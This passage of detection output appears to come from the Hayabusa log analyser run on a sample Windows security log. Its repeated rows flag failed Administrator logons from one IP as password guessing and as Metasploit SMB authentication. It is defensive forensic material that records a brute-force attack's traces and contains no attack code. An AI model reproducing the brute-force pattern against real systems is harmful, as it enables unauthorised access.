NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyChoTSKgJeK6yqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.234 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tG4I11dwpBM9SM3l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.234 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B7foAZ5Y1igCbHap : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.276 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ATDXUljQwg8WvUVs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.327 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdmXaJqQMAG2g6Ao : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.373 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bjame5puT5CDeoIG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.413 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.454 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 0FGGVVkckmdURVh6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.454 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j0Smqw4cA4wG2Q6m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.485 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KLWloOhUYEQlj6y6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Tuxuykh0j5afeTH : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.569 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.609 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aeXS6QwYhqJAOeuz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.609 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AqFSJCq5bmBW6dj1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DH1zyt1hxTgzajhW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.718 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.761 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rrZxcWjUX4OgYYIb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.761 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ExtkYXSJI8F41uvw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.807 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sLh1Q3RieOoukiCT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.845 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.881 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: kNb2hZDxi4QrbQpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.881 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.923 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jCb1TMlFj2PjH2sA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.923 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rgF42C57Nx6F3HU3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.973 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KZfFH9geIrxVYowJ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.005 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.039 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pWz1XeyxywR0o5gS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.039 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: og1kItEC6WhqXF37 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.083 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q0KhaJlD6tWwF2ky : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.121 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XUy0EKmjyD6ZYENA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.165 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h3MdGstPPFJDGzwG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.217 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VTs0ZQa6LGrKZKsY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.264 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: FefzWjMXSvMdvqcw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.304 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.345 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlnUt9tPRSXR5mWs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.345 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dehb4M6pcxi56Bkl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.384 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tLXHvGiUqZyxax4W : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bP1gKcf1eeKm0RB1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.473 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ldbN1odP77n0BOzO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.525 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: drRC8qCbPe5e4mdR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.562 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.607 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lBg39AUtzZi6Q4iz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.607 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: huv5YEPo1n7UiFkq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.650 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9CLLwao1NDtBulxs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: SB88EHHhDWhvJI87 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.732 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VtBvklueV4MZo3pJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.782 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: noha7Vw85VfURHik : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.828 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wl5eIYvoKpJGUcSl : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.861 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bsS3JTLUWcFYvxAE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gjM6hj2bGxC124oZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.957 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3IQkVcY5iMTxCRN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.005 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v44Kp3lpGKb6Xd4j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.045 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.082 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7e1skdEmGlXbzUWk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.082 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: feaA6lAxWjapFbAW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.181 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
